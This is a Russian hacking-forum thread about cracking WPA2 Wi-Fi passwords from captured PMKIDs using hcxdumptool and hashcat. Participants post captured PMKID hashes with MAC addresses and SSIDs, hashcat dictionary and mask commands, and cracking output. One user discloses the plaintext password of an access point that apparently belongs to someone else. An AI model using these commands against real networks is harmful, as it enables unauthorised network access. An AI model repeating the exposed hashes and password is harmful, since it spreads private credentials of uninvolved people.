Брут WPA2 без handshake используя PMKID + hashcat

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by Vikhedgehog, 6 Aug 2018.

  1. -=charon=-

    -=charon=- Elder - Старейшина

    Joined:
    5 Sep 2009
    Messages:
    220
    Likes Received:
    113
    Reputations:
    15
  2. Sektant1

    Sektant1 New Member

    Joined:
    13 Nov 2010
    Messages:
    29
    Likes Received:
    1
    Reputations:
    0
    40 канал не хочет ловить, это 5200 (5GHZ) . [хотя вроде сканирует
     

    Attached Files:

  3. rara_ivis

    rara_ivis New Member

    Joined:
    5 Apr 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    запустил hcxdumptool
    словил:

    5f3882ffb4b7ff1a2cb3cd6edcc05c31 * 28107b9d928c * a03299080f20 * 44534c2d3236303055
    22662d2da3d91715cfa954646bab5591 * c83a350b02d8 * f4f5db3e5830 * 54656e64615f42534e
    ec1faa47b83ec4a0304c63f064c698ad * c83a350b02d8 * f0a2258ee88d * 54656e64615f42534e

    скормил коту - кот выдал:
    5f3882ffb4b7ff1a2cb3cd6edcc05c31 * 28107b9d928c * a03299080f20 * 44534c2d3236303055: xxx59456

    проверил: echo 44534c2d3236303055 | xxd -r -p

    DSL-2600U

    но пас от этой ТД СОВСЕМ ДРУГОЙ и он был в словаре ,
    перепроверил второй раз, результат тот же, словил PMKID c помощью wifite и тот же результат.
    Думал может "бабка" пас сменила, перепроверил - нет пас тот же "150760Tusia"
    Что не так не разгребу
     
    #123 rara_ivis, 9 Nov 2018
    Last edited: 9 Nov 2018
  4. Mistral

    Mistral Well-Known Member

    Joined:
    30 Aug 2015
    Messages:
    2,078
    Likes Received:
    9,937
    Reputations:
    103
    rara_ivis
    1. кот нашёл 150760Tusia
    2.wifipr нашёл 150760Tusia
    3.Пробелы между * это так,чтобы побольше геморроя тестирующим?Я вот дурак например.Раза с третьего разобрался только чего это вдруг программа не принимает.
    Оно ведь так не проще наверно?
    5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a03299080f20*44534c2d3236303055
     
  5. Nikolka00

    Nikolka00 Member

    Joined:
    5 Nov 2018
    Messages:
    24
    Likes Received:
    13
    Reputations:
    0
    f0a2258ee88d - f4f5db3e5830
    Строку покажи как кормил кота и ещё, мак адрес атакующего рандом был?
    Возможно не тот словился pmkid

    pmkid не меняется если запрос не менялся, мак*мак*ТД , другой мак, другой pmkid
     
    #125 Nikolka00, 9 Nov 2018
    Last edited: 9 Nov 2018
  6. rara_ivis

    rara_ivis New Member

    Joined:
    5 Apr 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    пробелы появились сами , я скопировал текст из Linux в Wiнду и закинул сюда , пришлось еще несколько раз редактировать
     
  7. rara_ivis

    rara_ivis New Member

    Joined:
    5 Apr 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    pmkid ловил рандомно с помощю hcxdumptoo их уловил, 3 шт, скормил коту кот выдал это - 5f3882ffb4b7ff1a2cb3cd6edcc05c31 * 28107b9d928c * a03299080f20 * 44534c2d3236303055: xxx59456

    я проверяю essid :

    echo 44534c2d3236303055 | xxd -r -p

    DSL-2600U

    но я знаю что пас от этой тд - 150760Tusia
    еще раз проверю , чет я вобще запутался. Пас ххх59456 не подошёл ни к какой из видимых т.д
     
  8. Nikolka00

    Nikolka00 Member

    Joined:
    5 Nov 2018
    Messages:
    24
    Likes Received:
    13
    Reputations:
    0
    Не, строку как переберал pmkid на валидный пароль, ты там обмолвился на счет словаря, то что выше это предполагаемый и ты перевел после хекс в Анси - это ТД

    Сейчас с мобильного, так бы проверил, надо видимо на мобилу кота поставить

    Кста бинарники где можно взять под арм64? Никто не знает?
     
  9. rara_ivis

    rara_ivis New Member

    Joined:
    5 Apr 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    вот сохраненные данные pmkid

    5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a03299080f20*44534c2d3236303055
    22662d2da3d91715cfa954646bab5591*c83a350b02d8*f4f5db3e5830*54656e64615f42534e
    ec1faa47b83ec4a0304c63f064c698ad*c83a350b02d8*f0a2258ee88d*54656e64615f42534e

    вот их ssid

    root@kali:~# echo 44534c2d3236303055 | xxd -r -p
    DSL-2600Uroot@kali:~# echo 54656e64615f42534e | xxd -r -p
    Tenda_BSNroot@kali:~# echo 54656e64615f42534e | xxd -r -p
    Tenda_BSNroot

    скормил коту так
    hashcat -m 16800 -a 0 -w 3 -o "temp_cracked.txt" test.16800 '/root/02_Slovo_ri/Mask_sborka.txt' --force
    hashcat (v4.2.1) starting...

    в словаре есть пас от ТД "DSL-2600" я его туда еще раз прописал на всяк случай но кот не определяет этот пасс

    вот данные т.д

    28:10:7B:9D:92:8C -69 88 91 2 6 65 WPA2 CCMP PSK DSL-2600U 150760Tusia
     
  10. igrek

    igrek Member

    Joined:
    20 Aug 2016
    Messages:
    96
    Likes Received:
    60
    Reputations:
    1
    Может у Вас в словаре пробел на конце ?, попробуйте по маске.
    [​IMG]
     
  11. rara_ivis

    rara_ivis New Member

    Joined:
    5 Apr 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Уже завтра розбор полетов будет , но мне разобратся в этом просто необходимо , ладно если это словарь кривой , другое дело если это баг , я час назад словил pmkid , c этой же т.д и кот кинул в папку с этим же словарем уже другой пасс , как то рандомно чтоли . По идее если hashcat не подбирает пасс он же не должен создавать папку с выводом ?
     
  12. Nikolka00

    Nikolka00 Member

    Joined:
    5 Nov 2018
    Messages:
    24
    Likes Received:
    13
    Reputations:
    0
    так попробуй для пробы, судя по скрину этот PMKID
    для выньдос, под линухой возможно надо " заменить на '

    hashcat.exe -m 16800 -a 3 -w 3 -o "crack_password.txt" "5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a03299080f20*44534c2d3236303055" ?d?d?d?d60Tusia --force
     
  13. rara_ivis

    rara_ivis New Member

    Joined:
    5 Apr 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    hashcat.exe -m 16800 -a 3 -w 3 -o "crack_password.txt" "5f3882ffb4b7ff1a2cb3cd6edcc05c31*28107b9d928c*a03299080f20*44534c2d3236303055" ?d?d?d?d60Tusia --force[/QUOTE]

    по ходу кот сломался по маске не определяет пасс

    hashcat --force -m 16800 -a 3 -w 3 -o "temp_cracked.txt" d73fc0f1bfd1d0cd360215e41ab555cc*c83a350b02d8*f0a225c1dd6c*54656e64615f42534e ?d?d?d?d60Tusia
    hashcat (v4.2.1) starting...

    Session..........: hashcat
    Status...........: Exhausted
    Hash.Type........: WPA-PMKID-PBKDF2
    Hash.Target......: d73fc0f1bfd1d0cd360215e41ab555cc*c83a350b02d8*f0a22...42534e
    Time.Started.....: Sun Nov 11 04:25:33 2018 (37 secs)
    Time.Estimated...: Sun Nov 11 04:26:10 2018 (0 secs)
    Guess.Mask.......: ?d?d?d?d60Tusia [11]
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#1.....: 271 H/s (56.36ms) @ Accel:256 Loops:128 Thr:1 Vec:4
    Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
    Progress.........: 10000/10000 (100.00%)
    Rejected.........: 0/10000 (0.00%)
    Restore.Point....: 1000/1000 (100.00%)
    Candidates.#1....: 681360Tusia -> 676460Tusia
    HWMon.Dev.#1.....: N/A

    Started: Sun Nov 11 04:25:28 1632
    Stopped: Sun Nov 11 04:26:12 1631
     
  14. Mistral

    Mistral Well-Known Member

    Joined:
    30 Aug 2015
    Messages:
    2,078
    Likes Received:
    9,937
    Reputations:
    103
    Да ну?
    Tenda_BSN
    Tenda_BSN
    DSL-2600U
    Троллинг мультакк?
     
    #134 Mistral, 11 Nov 2018
    Last edited: 11 Nov 2018
    rara_ivis, Pirnazar and Spinus like this.
  15. rara_ivis

    rara_ivis New Member

    Joined:
    5 Apr 2018
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Я глубоко извиняюсь конечно перед теми кто потратил свое время на меня , конечно же с котом и с hcxами все в порядке .
    Это очередной пример того что перед тем как бить в колокола нужно с начала углубитться в мануалы, рукаводства и саму тему
    а уже потом тревожить гуру этого чата .

    сейчас кот мне выдает -это : INFO: All hashes found in potfile! Use --show to display them

    похоже хеши в hashcat.potfile

    вобщем дорога мне в hashcat.net/wiki/
     
    d0xDog likes this.
  16. Nikolka00

    Nikolka00 Member

    Joined:
    5 Nov 2018
    Messages:
    24
    Likes Received:
    13
    Reputations:
    0
    кто нибудь сравнивал фактическое быстродействие hashcat и john? версия 18013-omp-x64 понимает pmkid\16800-16001
     
  17. -Shake-

    -Shake- New Member

    Joined:
    28 Oct 2018
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    а я попробовал нефильтрованный созданный hcxdumptool файл.pcapng протестировать на онлайн-сервисах.
    В hcxdumptool применил фильтр канала и фильтр мак-адреса и с телефона подключался неправильным паролем к точке. Так hcxdumptool помимо моего хендшейка (причём без PMKID) захватил ещё один левый в обход моего фильтра :D и на ондлайн-сервисе расшифровался только мой неправильный пароль. :D
    но самое поганое, что захватил он в обход фильтра 1 левый хендшейк, но ещё проскакивал 1 PMKID и он его не записал.:mad:
     
  18. gpuhash

    gpuhash Elder - Старейшина

    Joined:
    22 Sep 2011
    Messages:
    466
    Likes Received:
    1,779
    Reputations:
    96
    Возможно онлайн-сервис и не предполагает наличие двух разных паролей с одинаковой солью в одном файле (что логично) и прекращает перебор после первого найденного пароля
     
  19. -Shake-

    -Shake- New Member

    Joined:
    28 Oct 2018
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    но вот, что странно:
    открыл я этот pcapng как текстовый файл и обнаружил где-то в середине чьё-то имя и фамилию на русском!:oops: откуда они там взялись??? :eek:
    ну и ещё пара слов на русском тоже были в разных местах файла.
     
  20. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,280
    Likes Received:
    8,503
    Reputations:
    113
    Открой в Wireshark и посмотри, в каких конкретно пакетах всё это дело.

    Может кто-то пытался к Wi-Fi сетям с русскими названиями подключаться.
     
    Spinus likes this.
Loading...